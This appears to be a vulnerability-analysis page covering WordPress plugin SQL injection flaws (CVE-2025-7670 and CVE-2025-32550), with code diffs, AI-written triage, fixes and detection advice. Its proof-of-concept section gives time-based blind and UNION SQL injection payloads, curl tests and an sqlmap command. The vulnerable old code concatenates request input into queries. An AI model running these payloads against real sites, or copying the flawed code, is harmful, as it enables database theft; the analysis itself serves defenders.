3. **Input Validation**: Add additional validation layers at application boundaries

### Detection Methods

**Log Monitoring:**
- Monitor for unusual SQL query patterns in database logs
- Watch for multiple failed query attempts
- Alert on queries containing SQL keywords from unauthorized sources

**Code Analysis:**
```bash
# Search for vulnerable patterns in codebase
grep -r "sprintf.*SELECT\|sprintf.*WHERE\|sprintf.*FROM" --include="*.php"
grep -r "\$wpdb->query.*\$" --include="*.php" | grep -v "prepare"
```

**Security Scanning:**
- Regular vulnerability scanning with tools like OWASP ZAP or Burp Suite
- Static application security testing (SAST) for PHP code
- Dynamic application security testing (DAST) for running instances

### Best Practices to Prevent Similar Issues

1. **Always Use Prepared Statements:**
   ```php
   // GOOD
   $wpdb->prepare("SELECT * FROM table WHERE id = %d", $user_input);
   
   // BAD
   "SELECT * FROM table WHERE id = " . $user_input;
   ```

2. **Input Validation and Sanitization:**
   - Validate input type and format
   - Use WordPress sanitization functions (`sanitize_text_field()`, `intval()`)
   - Implement allow-lists for expected values

3. **Principle of Least Privilege:**
   - Database users should have minimal necessary permissions
   - Separate read and write database connections
   - Use WordPress capabilities system for access control

4. **Security Testing:**
   - Implement unit tests for SQL injection prevention
   - Conduct regular security code reviews
   - Use automated security scanning in CI/CD pipelines

5. **Defense in Depth:**
   - Implement multiple validation layers
   - Use WordPress nonces for form submissions
   - Enable query logging for suspicious activity detection

6. **Education and Awareness:**
   - Train developers on secure coding practices
   - Maintain security documentation
   - Establish code review checklists including SQL injection checks

This vulnerability serves as a critical reminder of the importance of proper input handling in WordPress plugins and the necessity of regular security updates and code audits.

CVE-2025-7670 NVD

AI-Generated Analysis

# Comprehensive Security Analysis: CVE-2025-7670 - JS Archive List WordPress Plugin SQL Injection Vulnerability

## 1. Vulnerability Background

### What is this vulnerability?
CVE-2025-7670 is a critical SQL injection vulnerability in the JS Archive List plugin for WordPress, affecting all versions up to and including 6.1.5. The vulnerability exists in the `build_sql_where()` function and related SQL query construction methods, allowing unauthenticated attackers to inject malicious SQL queries through insufficiently sanitized user input.

### Why is it critical/important?
This vulnerability is particularly dangerous for several reasons:

1. **Unauthenticated exploitation**: Attackers don't need any authentication or privileges to exploit this vulnerability
2. **Time-based SQL injection**: Allows attackers to extract sensitive information through blind SQL injection techniques
3. **Database compromise**: Successful exploitation can lead to extraction of sensitive data including user credentials, personal information, and other confidential database contents
4. **Widespread impact**: The plugin had active installations, making this a significant attack vector

### What systems/versions are affected?
- **Affected versions**: JS Archive List plugin versions ≤ 6.1.5
- **Patched version**: 6.1.6 and later
- **Impacted platforms**: WordPress installations with the vulnerable plugin version
- **Attack vector**: Remote, unauthenticated

## 2. Technical Details

### Root Cause Analysis
The vulnerability stems from two primary issues in the plugin's database interaction layer:

1. **Direct string concatenation**: User-controlled parameters were directly concatenated into SQL queries without proper escaping or parameterization
2. **Lack of input validation**: Category IDs and other user-supplied parameters were not validated or sanitized before inclusion in SQL statements
3. **Missing prepared statements**: The plugin used `sprintf()` for query construction instead of WordPress's secure `$wpdb->prepare()` method

### Old Code vs New Code Analysis

#### Primary SQL Injection Vector (Lines 36-44 → 39-47)

**Old Vulnerable Code:**
```php
$sql = sprintf(
    'SELECT JAL.year, COUNT(JAL.ID) as `posts` FROM (
            SELECT DISTINCT YEAR(post_date) AS `year`, ID
            FROM  %s %s %s) JAL
        GROUP BY JAL.year ORDER BY JAL.year DESC',
    $wpdb->posts,
    $this->build_sql_join(),
    $this->build_sql_where()  // User input directly concatenated
);
return $wpdb->get_results( $sql );
```

**New Fixed Code:**
```php
list($where_clause, $where_args) = $this->build_sql_where();
$sql = "SELECT JAL.year, COUNT(JAL.ID) as `posts` FROM (
        SELECT DISTINCT YEAR(post_date) AS `year`, ID
        FROM  {$wpdb->posts} {$this->build_sql_join()} WHERE {$where_clause}) JAL
    GROUP BY JAL.year ORDER BY JAL.year DESC";
$results = $wpdb->get_results($wpdb->prepare($sql, ...$where_args));
return is_array($results) ? $results : null;
```

#### Secondary Injection Vector (Category ID Handling)

**Old Vulnerable Code:**
```php
if (! empty( $this->config['included'] ) ) {
    $ids   = is_array( $this->config['included'] ) ? implode( ',', $this->config['included'] ) : $this->config['included'];
    $where .= sprintf( 'AND %s.term_id IN (%s)', $wpdb->term_taxonomy, $ids );  // Direct concatenation
} elseif ( ! empty( $this->config['excluded'] ) ) {
    $ids   = is_array( $this->config['excluded'] ) ? implode( ',', $this->config['excluded'] ) : $this->config['excluded'];
    $where .= sprintf( 'AND %s.term_id NOT IN (%s)', $wpdb->term_taxonomy, $ids );  // Direct concatenation
}
```

**New Fixed Code:**
```php
$ids_key = !empty($this->config['included']) ? 'included' : (!empty($this->config['excluded']) ? 'excluded' : null);
if ($ids_key) {
    $ids = is_array($this->config[$ids_key]) ? $this->config[$ids_key] : explode(',', $this->config[$ids_key]);
    $ids = array_map('intval', $ids);  // Input validation
    $placeholders = implode(', ', array_fill(0, count($ids), '%d'));  // Parameter placeholders
    $operator = $ids_key === 'included' ? 'IN' : 'NOT IN';
    $where_parts[] = sprintf('%s.term_id %s (%s)', $wpdb->term_taxonomy, $operator, $placeholders);
    $prepare_args = array_merge($prepare_args, $ids);  // Values passed separately
}
```

### How These Changes Fix the Vulnerability

1. **Parameterized Queries**: The fixed code uses `$wpdb->prepare()` with proper placeholders (`%s`, `%d`) instead of direct string concatenation
2. **Input Validation**: User-supplied IDs are validated using `intval()` to ensure they're integers
3. **Separation of Logic**: SQL structure and data values are kept separate until execution
4. **Proper Escaping**: WordPress's database abstraction layer handles proper escaping based on context

### Security Improvements Introduced

1. **Defense in Depth**: Multiple layers of protection including input validation and prepared statements
2. **Type Enforcement**: Strict type casting ensures only integers are used for ID parameters
3. **Error Handling**: Added null checks and array validation for robustness
4. **Modern WordPress Practices**: Aligned with WordPress coding standards and security best practices

## 3. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation
1. WordPress installation with JS Archive List plugin ≤ 6.1.5
2. Plugin must be active and accessible
3. Network access to the target WordPress site
4. Basic understanding of SQL injection techniques

### Step-by-Step Exploitation Approach

**Step 1: Identify Vulnerable Endpoint**
```http
GET /wp-content/plugins/js-archive-list/[endpoint]?parameter=[injection_point]
```

**Step 2: Time-Based Blind SQL Injection**
```sql
' OR IF(1=1,SLEEP(5),0)--
```

**Step 3: Information Extraction Example**
```sql
' OR IF(SUBSTRING((SELECT user_login FROM wp_users LIMIT 1),1,1)='a',SLEEP(2),0)--
```

**Step 4: Database Schema Enumeration**
```sql
' UNION SELECT NULL,table_name FROM information_schema.tables--
```

### Expected Behavior vs Exploited Behavior

**Normal Behavior:**
- Plugin retrieves archive data based on legitimate parameters
- Queries execute quickly (typically < 100ms)
- Returns structured archive listing data

**Exploited Behavior:**
- Delayed responses when time-based payloads are injected
- Database errors may appear in logs
- Unexpected data returned in responses
- Successful extraction of sensitive information through blind techniques

### How to Verify the Vulnerability Exists

**Manual Testing:**
```bash
# Test for time-based injection
time curl "http://target.site/?parameter='+OR+SLEEP(5)--"

# Check for error responses
curl "http://target.site/?parameter='"
```

**Automated Testing:**
```bash
# Using sqlmap
sqlmap -u "http://target.site/vulnerable-endpoint" --batch --level=5 --risk=3

# Custom detection script
python3 detect_sqli.py --url http://target.site --parameter param_name
```

**Log Analysis:**
- Monitor WordPress debug logs for SQL errors
- Check database query logs for unusual patterns
- Review web server access logs for injection attempts

## 4. Recommendations

### Mitigation Strategies

**Immediate Actions:**
1. **Update immediately**: Upgrade to JS Archive List plugin version 6.1.6 or later
2. **Temporary workaround**: If update isn't possible, disable the plugin until patched
3. **Access restriction**: Use web application firewall (WAF) rules to block SQL injection patterns
4. **Input validation**: Implement additional input filtering at the application level

**Long-term Solutions:**
1. **Regular updates**: Establish a patch management process for all plugins
2. **Security monitoring**: Implement continuous vulnerability scanning
3. **Least privilege**: Ensure database users have minimal necessary permissions
4. **Backup strategy**: Maintain regular, tested backups for quick recovery

### Detection Methods

**Active Detection:**
```php
// WordPress security scanner integration
add_action('init', function() {
    if (defined('JAL_VERSION') && version_compare(JAL_VERSION, '6.1.6', '<')) {
        error_log('Vulnerable JS Archive List plugin detected: ' . JAL_VERSION);
    }
});
```

**Passive Detection:**
1. **Log monitoring**: Look for SQL error patterns in application logs
2. **IDS/IPS signatures**: Deploy signatures for WordPress plugin vulnerabilities
3. **Behavioral analysis**: Monitor for unusual database query patterns
4. **File integrity checking**: Detect unauthorized changes to plugin files

### Best Practices to Prevent Similar Issues

**Development Practices:**
1. **Always use prepared statements**: Never concatenate user input into SQL queries
2. **Input validation**: Validate and sanitize all user inputs before processing
3. **Principle of least privilege**: Database accounts should have minimal permissions
4. **Security testing**: Implement regular code reviews and security testing

**WordPress-Specific Recommendations:**
1. **Use WordPress APIs**: Leverage `$wpdb->prepare()`, `esc_sql()`, and other security functions
2. **Follow coding standards**: Adhere to WordPress PHP and security coding standards
3. **Regular updates**: Subscribe to security mailing lists and update promptly
4. **Security plugins**: Consider using security plugins that monitor for SQL injection attempts

**Monitoring and Response:**
1. **Implement logging**: Enable WordPress debug logging in production (with caution)
2. **Regular audits**: Conduct periodic security audits of custom code and plugins
3. **Incident response plan**: Have a plan for responding to security incidents
4. **Education and training**: Ensure developers understand secure coding practices

**Additional Security Measures:**
1. **Web Application Firewall**: Deploy a WAF with SQL injection protection
2. **Database firewall**: Implement database-level security controls
3. **Rate limiting**: Prevent brute force attacks through request throttling
4. **Security headers**: Implement appropriate HTTP security headers

By implementing these recommendations, organizations can significantly reduce their attack surface and improve their resilience against SQL injection attacks and similar vulnerabilities in WordPress plugins.

05 · Findings filter · search · paginate

Showing 0 to 0 of 0 results

[CVE-2025-32550] [Click & Pledge CONNECT: 2.24080000-WP6.6.1→2.24120000-WP6.7.1] cnpPledgeTVDetails.php AI: 3 vulnerabilities 3 true positives CVE-2025-32550

--- cache/click-pledge-connect_2.24080000-WP6.6.1/cnpPledgeTVDetails.php	2025-12-04 14:06:23.600345305 +0000+++ cache/click-pledge-connect_2.24120000-WP6.7.1/cnpPledgeTVDetails.php	2025-12-04 14:06:27.808615423 +0000@@ -1,70 +1,90 @@-<?php
-function cnp_pledgetvformdetails() {
-
-	global $wpdb;    global $cnp_settingtable_name;global $cnp_table_name;
-	$info          = $_REQUEST["info"];
-    $cnpresltdsply = "";
-	if($info=="saved")
-	{
-		echo "<div class='updated' id='message'><p><strong>Form Added</strong>.</p></div>";
-	}
-	if($info=="failed")
-	{
-		echo "<div class='updated' id='message'><p><strong>Already Existed</strong>.</p></div>";
-	}
-	if($info=="upd")
-	{
-		echo "<div class='updated' id='message'><p><strong>Form updated</strong>.</p></div>";
-	}
-	if($info=="sts")
-	{
-		echo "<div class='updated' id='message'><p><strong>Status updated</strong>.</p></div>";
-	}
-	if($info=="del")
-	{
-		$delid=$_GET["did"];
-		$wpdb->query("delete from ".$cnp_table_name." where cnpform_ID =".$delid);
-		echo "<div class='updated' id='message'><p><strong>Record Deleted.</strong>.</p></div>";
-	}
-	if(isset($_GET['cnpsts']) && $_GET['cnpsts']  !="")
-	{	
-		$cnpstsrtnval = CNPCF_updateCnPstatus($cnp_table_name,'cnpform_status','cnpform_ID',$_GET['cnpviewid'],$_GET['cnpsts']);
-		if($cnpstsrtnval == true){$cnpredirectval = "sts";}else{$cnpredirectval = "stsfail";}
-		wp_redirect("admin.php?page=cnp_formsdetails&info=".$cnpredirectval);
-		exit;
-	}
-
-?>
-<script type="text/javascript">
-	/* <![CDATA[ */
-	jQuery(document).ready(function(){
-		jQuery('#cnpformslist').dataTable();
-		jQuery("tr:even").css("background-color", "#f1f1f1");
-	});
-	/* ]]> */
-
-</script>
-<?php
-		$cnpresltdsply = '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><div class="wrap">
-			              <h2>Latest Channels</h2><p></p>
-			              <table class="wp-list-table widefat  " id="cnpformslist" ><thead><tr><th><u>Channel ID</u></th><th><u>Channel Name</u></th><th><u>Raised</u></th><th><u>Plays</u></th></tr></thead><tbody>';
-
-		
-				//$cnpresltdsply .= '<tr><td></td><td></td><td ></td><td></td></tr>';
-				$cnpresltdsply .= '<tr><td colspan=4>No Record Found!</td></tr>';
-		
-		 $cnpresltdsply .= '</tbody></table></div>';
-		 echo $cnpresltdsply ;
-	
-	$cnpresltdsply = '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><div class="wrap">
-			              <h2>Latest Pledge Videos</h2><p></p>
-			              <table class="wp-list-table widefat  " id="cnpformslist" ><thead><tr><th><u>Name</u></th><th><u>Raised</u></th><th><u>Plays</u></th></tr></thead><tbody>';
-
-		// $cnpresltdsply .= '<tr><td colspan=4></td><td></td><td ></td></tr>';
-				$cnpresltdsply .= '<tr><td colspan=3>No Record Found!</td></tr>';
-			
-		
-		 $cnpresltdsply .= '</tbody></table></div>';
-		 echo $cnpresltdsply ;
-}
+<?php+function cnp_pledgetvformdetails() {++	global $wpdb;    global $cnp_settingtable_name;global $cnp_table_name;+	$info          = $_REQUEST["info"];+    $cnpresltdsply = "";+	if($info=="saved")+	{+		echo "<div class='updated' id='message'><p><strong>Form Added</strong>.</p></div>";+	}+	if($info=="failed")+	{+		echo "<div class='updated' id='message'><p><strong>Already Existed</strong>.</p></div>";+	}+	if($info=="upd")+	{+		echo "<div class='updated' id='message'><p><strong>Form updated</strong>.</p></div>";+	}+	if($info=="sts")+	{+		echo "<div class='updated' id='message'><p><strong>Status updated</strong>.</p></div>";+	}+	if ($info == "del") {+  +    $delid = isset($_GET['did']) ? intval($_GET['did']) : 0;++    if ($delid > 0) {+      +        $wpdb->query($wpdb->prepare("DELETE FROM $cnp_table_name WHERE cnpform_ID = %d", $delid));+        +        echo "<div class='updated' id='message'><p><strong>Record Deleted.</strong></p></div>";+    } else {+        echo "<div class='error' id='message'><p><strong>Invalid ID.</strong></p></div>";+    }+}++if (isset($_GET['cnpsts']) && $_GET['cnpsts'] != "") {+  +    $cnpsts = sanitize_text_field($_GET['cnpsts']);+    $cnpviewid = isset($_GET['cnpviewid']) ? intval($_GET['cnpviewid']) : 0;++    if ($cnpviewid > 0 && in_array($cnpsts, ['active', 'inactive'], true)) { +    +        $cnpstsrtnval = CNPCF_updateCnPstatus($cnp_table_name, 'cnpform_status', 'cnpform_ID', $cnpviewid, $cnpsts);+        +        if ($cnpstsrtnval) {+            $cnpredirectval = "sts";+        } else {+            $cnpredirectval = "stsfail";+        }++        wp_redirect("admin.php?page=cnp_formsdetails&info=" . $cnpredirectval);+        exit;+    } else {+        echo "<div class='error' id='message'><p><strong>Invalid status or ID.</strong></p></div>";+    }+}+++?>+<script type="text/javascript">+	/* <![CDATA[ */+	jQuery(document).ready(function(){+		jQuery('#cnpformslist').dataTable();+		jQuery("tr:even").css("background-color", "#f1f1f1");+	});+	/* ]]> */++</script>+<?php+		$cnpresltdsply = '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><div class="wrap">+			              <h2>Latest Channels</h2><p></p>+			              <table class="wp-list-table widefat  " id="cnpformslist" ><thead><tr><th><u>Channel ID</u></th><th><u>Channel Name</u></th><th><u>Raised</u></th><th><u>Plays</u></th></tr></thead><tbody>';++				$cnpresltdsply .= '<tr><td colspan=4>No Record Found!</td></tr>';+		+		 $cnpresltdsply .= '</tbody></table></div>';+		 echo $cnpresltdsply ;+	+	$cnpresltdsply = '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><div class="wrap">+			              <h2>Latest Pledge Videos</h2><p></p>+			              <table class="wp-list-table widefat  " id="cnpformslist" ><thead><tr><th><u>Name</u></th><th><u>Raised</u></th><th><u>Plays</u></th></tr></thead><tbody>';++				$cnpresltdsply .= '<tr><td colspan=3>No Record Found!</td></tr>';+			+		+		 $cnpresltdsply .= '</tbody></table></div>';+		 echo $cnpresltdsply ;+} ?>\ No newline at end of file

AI Analysis

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - cnpPledgeTVDetails.php lines 23-24  
Old Code:  
```php
$delid=$_GET["did"];
$wpdb->query("delete from ".$cnp_table_name." where cnpform_ID =".$delid);
```  
Fixed Code:  
```php
$delid = isset($_GET['did']) ? intval($_GET['did']) : 0;
if ($delid > 0) {
    $wpdb->query($wpdb->prepare("DELETE FROM $cnp_table_name WHERE cnpform_ID = %d", $delid));
}
```  
Explanation:  
The old code directly concatenated the user-controlled `$_GET['did']` into an SQL query, enabling SQL injection if a malicious value was provided. The fix uses `intval()` to ensure the value is an integer and uses `$wpdb->prepare()` with a parameterized query, effectively neutralizing the injection risk.

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - cnpPledgeTVDetails.php lines 36-37  
Old Code:  
```php
$cnpstsrtnval = CNPCF_updateCnPstatus($cnp_table_name,'cnpform_status','cnpform_ID',$_GET['cnpviewid'],$_GET['cnpsts']);
```  
Fixed Code:  
```php
$cnpsts = sanitize_text_field($_GET['cnpsts']);
$cnpviewid = isset($_GET['cnpviewid']) ? intval($_GET['cnpviewid']) : 0;
if ($cnpviewid > 0 && in_array($cnpsts, ['active', 'inactive'], true)) {
    $cnpstsrtnval = CNPCF_updateCnPstatus($cnp_table_name, 'cnpform_status', 'cnpform_ID', $cnpviewid, $cnpsts);
}
```  
Explanation:  
The old code passed unsanitized `$_GET['cnpsts']` and `$_GET['cnpviewid']` to a function and later used them in a redirect. This could allow XSS if the values were reflected in output. The fix sanitizes `cnpsts` with `sanitize_text_field()`, validates `cnpviewid` with `intval()`, and restricts `cnpsts` to specific allowed values, preventing injection.

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-20: Improper Input Validation - cnpPledgeTVDetails.php lines 36-37  
Old Code:  
```php
if(isset($_GET['cnpsts']) && $_GET['cnpsts']  !="")
{	
    $cnpstsrtnval = CNPCF_updateCnPstatus($cnp_table_name,'cnpform_status','cnpform_ID',$_GET['cnpviewid'],$_GET['cnpsts']);
```  
Fixed Code:  
```php
if (isset($_GET['cnpsts']) && $_GET['cnpsts'] != "") {
    $cnpsts = sanitize_text_field($_GET['cnpsts']);
    $cnpviewid = isset($_GET['cnpviewid']) ? intval($_GET['cnpviewid']) : 0;
    if ($cnpviewid > 0 && in_array($cnpsts, ['active', 'inactive'], true)) {
        $cnpstsrtnval = CNPCF_updateCnPstatus($cnp_table_name, 'cnpform_status', 'cnpform_ID', $cnpviewid, $cnpsts);
    }
}
```  
Explanation:  
The old code lacked validation for `cnpviewid` and `cnpsts`, allowing arbitrary values that could lead to SQL injection, XSS, or logical errors. The fix adds type validation (`intval`), whitelisting (`in_array`), and sanitization, ensuring only expected values are processed.

CVE Analysis Results:

CVE-2025-32550: Yes

View CVE Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ClickandPledge Click & Pledge Connect Plugin allows SQL Injection. This issue affects Click & Pledge Connect Plugin: from 2.24080000 through WP6.6.1.

[CVE-2025-32550] [Click & Pledge CONNECT: 2.24080000-WP6.6.1→2.24120000-WP6.7.1] cnpSettings.php AI: 3 vulnerabilities 3 true positives CVE-2025-32550

--- cache/click-pledge-connect_2.24080000-WP6.6.1/cnpSettings.php	2025-12-04 14:06:23.600345305 +0000+++ cache/click-pledge-connect_2.24120000-WP6.7.1/cnpSettings.php	2025-12-04 14:06:27.808615423 +0000@@ -1,200 +1,235 @@-<?php
-function cnp_formssettings() {
-
-	global $wpdb;    global $cnp_settingtable_name;
-	$info          = $_REQUEST["info"];
-    $cnpresltdsply = "";$hidval	   = 1;$cnpbtn = "Save";
-
-
-
-	if($info=="saved")
-	{
-		echo "<div class='updated' id='message'><p><strong>Account Added</strong>.</p></div>";
-	}
-	if($info=="failed")
-	{
-		echo "<div class='updated' id='message'><p><strong>Please check the account details is correct or not (or) with this account id campaigns are not added.</strong>.</p></div>";
-	}
-	if($info=="exist")
-	{
-		echo "<div class='updated' id='message'><p><strong> Friendly Name or Account Number already exist.</strong>.</p></div>";
-	}
-	if($info=="upd")
-	{
-		echo "<div class='updated' id='message'><p><strong>Account updated</strong>.</p></div>";
-	}
-
-	if($info=="del")
-	{
-		$delid=$_GET["did"];
-		$cnpnoofforms = CNPCF_getAccountNumbersInfo($delid);
-		$cnpnoofchnls = CNPCF_getchnlAccountNumbersInfo($delid);
-		if(($cnpnoofforms==0) && ($cnpnoofchnls == 0)){
-		$wpdb->query("delete from ".$cnp_settingtable_name." where cnpstngs_ID =".$delid);
-		echo "<div class='updated' id='message'><p><strong>Record Deleted.</strong>.</p></div>";
-			}
-		else
-		{
-			echo "<div class='updated' id='message'><p><strong>This Account Number is associated with an existing form group (or) channel group. You must first delete the form group (or) channel group before deleting this account.</strong></p></div>";
-		}
-		
-	}
-	if(isset($_POST["cnpbtnaddsettings"]))
-	{
-		 $addform=$_POST["addformval"];
-		global $wpdb;
-		global $cnp_table_name;
-		if($addform==1)
-		{$cnprtnval="";
-			$cnprtnval = CNPCF_addSettings($cnp_table_name,$_POST);
-
-			if($cnprtnval >= 1){$cnpredirectval = "saved";}
-		    else if($cnprtnval == "0"){$cnpredirectval = "failed";}
-			else if($cnprtnval == "error"){$cnpredirectval = "exist";}
-		 	else{$cnpredirectval = "failed";}
-			wp_redirect("admin.php?page=cnp_formssettings&info=".$cnpredirectval);
-			exit;
-		}
-		else if($addform==2)
-		{
-			$cnprtnval =CNPCF_updateSettings($cnp_table_name,$_POST);
-			if($cnprtnval >=1){$cnpredirectval = "upd";}else{$cnpredirectval = "failed";}
-			wp_redirect("admin.php?page=cnp_formssettings&info=".$cnpredirectval);
-			exit;
-		}
-
-	}
-	$act=$_REQUEST["cnpviewid"];
-	if(isset($act) && $act!="")
-	{
-		global $wpdb;
-		global $cnp_settingtable_name;
-
-		$cnpfrmdtresult    = CNPCF_GetCnPGroupDetails($cnp_settingtable_name,'cnpstngs_ID',$_GET['cnpviewid']);
-		foreach ($cnpfrmdtresult as $cnprtnval) {}
-
-	 if (count($cnprtnval)> 0 )
-		 {
-
-
-				$cnpsetid              = $cnprtnval->cnpstngs_ID;
-				$cnpsetfrndlynm        = $cnprtnval->cnpstngs_frndlyname;
-			 	$cnpsetAccountNumber   = $cnprtnval->cnpstngs_AccountNumber;
-				$cnpsetguid            = $cnprtnval->cnpstngs_guid;
-				$cnpbtn	               = "Update";
-				$hidval	               = 2;
-
-
-		}
-	}
-?>
-<script type="text/javascript">
-	/* <![CDATA[ */
-	jQuery(document).ready(function(){
-		jQuery('#cnpsettingslist').dataTable();
-		jQuery("tr:even").css("background-color", "#f1f1f1");
-	});
-	/* ]]> */
-
-</script>
-<?php
-	 $cnpfrmtyp= wp_unslash( sanitize_text_field( $_REQUEST["act"]));
-	if($cnpfrmtyp == "edit"){$msgdsplycntnt = "style ='display:block'";}else{$msgdsplycntnt = "style ='display:none'";}
-	if($cnpfrmtyp == "edit"){ $msgdbtnsplycntnt = "style ='display:none'";}else{$msgdbtnsplycntnt = "style ='float:left;display:block'";}
-
-	$cnpresltdsply = '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><div class="wrap">
-	<h2>Click & Pledge Account &nbsp;</h2>
-	<div id="col-left" style="width:48% !important; float:none;">
-	<div class="col-wrap">
-		<div>
-			<div class="form-wrap">
-			 <table class="form-table" id="cnpformslist" align="center" >
-
-			 <tr><td>
-			 <div>	<h2>Add New Account</h2>	</div>
-				<form class="validate"  method="post" id="addsettings" name="addsettings">
-				<input type="hidden" name="cnphdnediturl" id="cnphdnediturl" value="'.CNP_CF_PLUGIN_URL.'getcnpditactivecampaigns.php">
-				<input type="hidden" name="cnphdnerrurl" id="cnphdnerrurl" value="'.CNP_CF_PLUGIN_URL.'cnpSettingmsgs.php">
-				<input type="hidden" name="addformval" id="addformval" value='.$hidval.'>
-				<input type="hidden" name="hdnfrmid" id="hdnfrmid" value="'.$cnpsetid .'">
-
-				<div class="form-field cnpaccountId">
-				<label for="tag-name"> <b>Click & Pledge Account Number*</b></label>
-				<input type="text" size="10" id="txtcnpacntid" name="txtcnpacntid"  value="'.$cnpsetAccountNumber.'" />
-				<p style="font-size:12px;">Get your "Account Number" from Click & Pledge<br>
-[CONNECT > Launcher > Settings > API Information > Account ID]</p>
-				<span class=cnperror id="spncnpacntid"></span>
-				</div>
-
-					<div class="form-field cnpacntguid">
-						<label for="tag-name"> <b>Click & Pledge Account GUID*</b></label>
-						<input type="text" size="20" id="txtcnpacntguid" name="txtcnpacntguid" value="'.$cnpsetguid.'" /><div class="tooltip" >
-						<i class="fa fa-question-circle"></i>
-						<span class="tooltiptext">Please collect the Account GUID from your CONNECT Portal or for More Help <a href="https://support.clickandpledge.com/s/article/how-to-locate-account-id--api-account-guid" target="_blank">click here</a></span>
-						</div>
-						<p style="font-size:12px;">Get your "Account GUID" from Click & Pledge<br>
- [CONNECT > Launcher > Settings > API Information > API (PaaS / FaaS): Account GUID]</p>
-					</div>
-						<div '.$msgdbtnsplycntnt.'>
-						 <input type="button" name="cnpbtnverifysettings" id="cnpbtnverifysettings" value="Verify" class="button button-primary"><br>
-						
-						 </div>
-						 	<div class="frmaddnickdiv" '.$msgdsplycntnt.'>
-					<div class="form-field cnpfrmfrndlynm" >
-					<label for="tag-name">Nickname*</label>
-					<input type="text" size="20" id="txtcnpfrmfrndlynm" name="txtcnpfrmfrndlynm" value="'.$cnpsetfrndlynm.'" onkeypress="return AvoidSpace(event)"/>
-					<span class=cnperror id="spnfrndlynm"></span>
-					</div>
-
-						 <div style="float:left">
-						 <input type="submit" name="cnpbtnaddsettings" id="cnpbtnaddsettings" value="'.$cnpbtn.'" class="button button-primary">
-						 </div>
-</div>
-						 </form>
-						 </tr></td></table>
-						
-						 </div>
-						 </div>
-						 </div>
-						 </div>
-						 <div > <div style="float:left" width="100%"><span class="cnperror" id="spnverify" style="display:none"><p>Communication Error:</p>
- 
-<p>Sorry but I am having difficulty communicating with the Click & Pledge services due to the absence of the SOAP extension in your WordPress installation.  The following links may help in resolving this issue:</p>
- 
-<p>Complete details page: <a href ="http://php.net/manual/en/book.soap.php" target="_blank">http://php.net/manual/en/book.soap.php</a></p>
-<p>Installing SOAP for PHP: <a href ="http://php.net/manual/en/soap.installation.php" target="_blank">http://php.net/manual/en/soap.installation.php</a></p>
-<p>Configuring after installation: <a href ="http://php.net/manual/en/soap.configuration.php" target="_blank">http://php.net/manual/en/soap.configuration.php</a></p>
- 
-<p>You may need to contact your server administrator for installation of the SOAP extension on the server.<p></span></div>
-	<div class="col-wrap">
-		<div>
-			<div class="cnp_scrollable_x">
-			              <table style="width:99%;" class="wp-list-table widefat" id="cnpsettingslist" ><thead><tr><th>Nickname </th><th>Account Number</th><th>GUID</th><th>Created Date/Time</th><th>Actions</th></tr></thead><tbody>';
-
-		 $sql          = "select * from ".$cnp_settingtable_name."  order by cnpstngs_ID desc";
-		 $result       = $wpdb->get_results($sql);
-		 if($wpdb->num_rows > 0 )
-		 {
-			foreach($result as $cnpsettingsData):
-
-				$cnpform_id     = $cnpsettingsData->cnpstngs_ID;
-				$gname          = $cnpsettingsData->cnpstngs_frndlyname;
-				$account        = $cnpsettingsData->cnpstngs_AccountNumber;
-				$accountguid    = $cnpsettingsData->cnpstngs_guid;
-			    $frmmodifieddt   = new DateTime($cnpsettingsData->cnpstngs_Date_Modified);
-			    $frmmodifiddt   = date_format(date_create($cnpsettingsData->cnpstngs_Date_Modified),"d-m-Y H:i:s");
-
-
-				$cnpresltdsply .= '<tr><td>'.$gname.'</td><td >'.$account.'</td><td>'.$accountguid.'</td><td data-sort="'.strtotime($frmmodifiddt).'">'.$frmmodifieddt->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP).'</td>
-
-								   <td ><u><input type="hidden" name="hdnsetngsid'.$cnpform_id.'" id="hdnsetngsid'.$cnpform_id.'" value="'.$cnpform_id .'">
-								   <input type="hidden" name="hdncnpaccntid'.$cnpform_id.'" id="hdncnpaccntid'.$cnpform_id.'" value="'.$account .'">
-								   <input type="hidden" name="hdncnpguid'.$cnpform_id.'" id="hdncnpguid'.$cnpform_id.'" value="'.$accountguid .'"> <input type="hidden" name="hdncnptblname" id="hdncnptblname" value="'.$cnp_settingtable_name .'"><a href="#" id="myHref" onclick="return mycnpaccountId('.$cnpform_id.')"><span class="dashicons dashicons-update"></span></a></u> |  <u><a href="admin.php?page=cnp_formssettings&info=del&did='.$cnpform_id.'" ><span class="dashicons dashicons-trash"></span></a></u></td></tr>';
-			endforeach;
-	     }
-		 else {$cnpresltdsply .= '<tr><td>No Record Found!</td><tr>';}
-
-		 $cnpresltdsply .= '</tbody></table></div>';
-		 echo $cnpresltdsply ;
-}
-?>
